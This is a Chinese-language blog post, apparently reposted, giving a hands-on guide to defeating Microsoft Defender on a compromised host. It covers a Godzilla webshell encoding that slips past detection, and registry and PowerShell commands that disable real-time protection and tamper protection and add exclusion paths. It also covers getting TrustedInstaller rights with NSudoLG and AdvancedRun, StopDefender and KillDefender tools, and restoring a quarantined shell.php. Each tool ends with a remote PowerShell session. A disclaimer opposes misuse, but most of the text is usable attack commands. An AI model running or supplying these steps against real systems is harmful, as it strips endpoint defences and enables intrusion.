声明：本人坚决反对利用文章内容进行恶意攻击行为，一切错误行为必将受到惩罚，绿色网络需要靠我们共同维护，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

Microsoft Defender 防病毒软件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。

Microsoft Defender 防病毒软件是 Microsoft Defender for Endpoint 中下一代保护的主要组件。这种保护将机器学习、大数据分析、深入的威胁防御研究和 Microsoft 云基础设施结合在一起，以保护您组织中的设备（或端点）。Microsoft Defender 防病毒软件内置于 Windows 中，它与 Microsoft Defender for Endpoint 配合使用，为你的设备和云提供保护。

被攻击目标操作系统环境

（1）defender版本

（2）系统补丁信息

（3）systeminfo 信息

攻击前的准备工作

web环境：phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

经过测试，用Godzilla自带的PHP_XOR_BASE64加密器即可免杀（php一句话直接杀），生成 PHP_XOR_BASE64 webshell

静态免杀测试

连接webshell

动态免杀测试

windows命令介绍

cmd

#查看排除项reg query 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions' /s#查看版本dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b#查看篡改保护（返回结果中的数值5代表开启，数值4代表关闭）reg query 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection'#需要TrustedInstaller权限##cmd注册表关闭Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f##cmd关闭篡改保护

NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features' /v 'TamperProtection' /d 4 /t REG_DWORD /f'

##cmd注册表恢复Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f##cmd添加Windows defender排除项reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f

powershell

#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath 'c:\temp'#删除排除项Remove-MpPreference -ExclusionPath 'C:\test'#关闭实时保护Set-MpPreference -DisableRealtimeMonitoring $true

命令行关闭defender

TrustedInstaller是从Windows Vista开始出现的一个内置安全主体，在Windows中拥有修改系统文件权限，本身是一个服务，以一个账户组的形式出现。它的全名是：NT SERVICE\TrustedInstaller

为什么要获取TrustedInstaller权限？说白了就是因为Administratior权限和system权限无法关闭Windows defender

注意：以下工具和技巧皆需要Administratior权限才能成功使用

（1）NSudoLG

工具地址：https://github.com/M2Team/NSudo

下载后使用：

D:\Documents\NSudo_8.2_All_Components\NSudoLauncher\x64\NSudoLG.exe

免杀测试

使用方法

注意：此工具的 -U:T 参数是获取了 TrustedInstaller 权限

#cmd注册表关闭Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f#cmd注册表恢复Windows defenderreg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f#cmd添加Windows defender排除项

reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f

#NSudoLG.exe关闭Windows defenderNSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 1 /f'#NSudoLG.exe恢复Windows defenderNSudoLG.exe -U:T cmd /c 'reg add 'HKLM\SOFTWARE\Microsoft\Windows Defender' /v DisableAntiSpyware /t reg_dword /d 0 /f'#NSudoLG.exe添加Windows defender排除项

NSudoLG.exe -U:T cmd /c 'reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /v 'c:\temp' /d 0 /t REG_DWORD /f'

powershell成功上线

（2）AdvancedRun

地址：https://www.nirsoft.net/utils/advanced_run.html

免杀测试

使用方法

AdvancedRun.exe /EXEFilename '%windir%\system32\cmd.exe' /CommandLine '/c reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableRealtimeMonitoring' /d 1 /t REG_DWORD /f' /RunAs 8 /Run

powershell成功上线

（3）StopDefender

Github地址：https://github.com/lab52io/StopDefender

免杀测试

使用方法

StopDefender_x64.exe

powershell成功上线

powershell

#查看排除项Get-MpPreference | select ExclusionPath#关闭Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true#增加排除项Add-MpPreference -ExclusionPath 'c:\temp'#删除排除项Remove-MpPreference -ExclusionPath 'C:\test'

关闭 Windows defender

关闭实时保护

Set-MpPreference -DisableRealtimeMonitoring $true

（4）MpCmdRun介绍

配置和管理 Microsoft Defender 防病毒软件的命令行工具详情

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide

MpCmdRun的位置为：

C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>

#查看版本（查看<antimalware platform version>）dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\' /od /ad /b#验证dir 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\' | findstr MpCmdRun

基础命令

#查看被隔离的文件列表MpCmdRun -Restore -ListAll#恢复指定名称的文件至原目录MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php#恢复所有文件至原目录MpCmdRun -Restore -All#查看指定路径是否位于排除列表中MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\

移除Token导致Windows Defender失效

Windows Defender进程为MsMpEng.exe,MsMpEng.exe是一个受保护的进程(Protected Process Light，简写为PPL)

非 PPL 进程无法获取 PPL 进程的句柄，导致我们无法直接结束 PPL 进程 MsMpEng.exe, 但是我们能够以 SYSTEM 权限运行的线程修改进程 MsMpEng.exe 的 token, 当我们移除进程 MsMpEng.exe 的所有 token 后，进程 MsMpEng.exe 无法访问其他进程的资源，也就无法检测其他进程是否有害，最终导致 Windows Defender 失效。

本人没有利用成功过

工具地址

https://github.com/pwn1sher/KillDefender

https://github.com/Octoberfest7/KillDefender

https://github.com/Octoberfest7/KDStab

参考文章

https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw

https://zhuanlan.zhihu.com/p/538571344

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender

https://cloud.tencent.com/developer/article/1870239

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。

（3）systeminfo 信息

静态免杀测试

连接webshell

动态免杀测试

cmd

powershell

（1）NSudoLG

免杀测试

使用方法

powershell成功上线

（2）AdvancedRun

免杀测试

使用方法

powershell成功上线

（3）StopDefender

免杀测试

使用方法

powershell成功上线

powershell

关闭 Windows defender

关闭 实时保护

（4）MpCmdRun介绍

基础命令

移除Token导致Windows Defender失效

工具地址

参考文章

关闭实时保护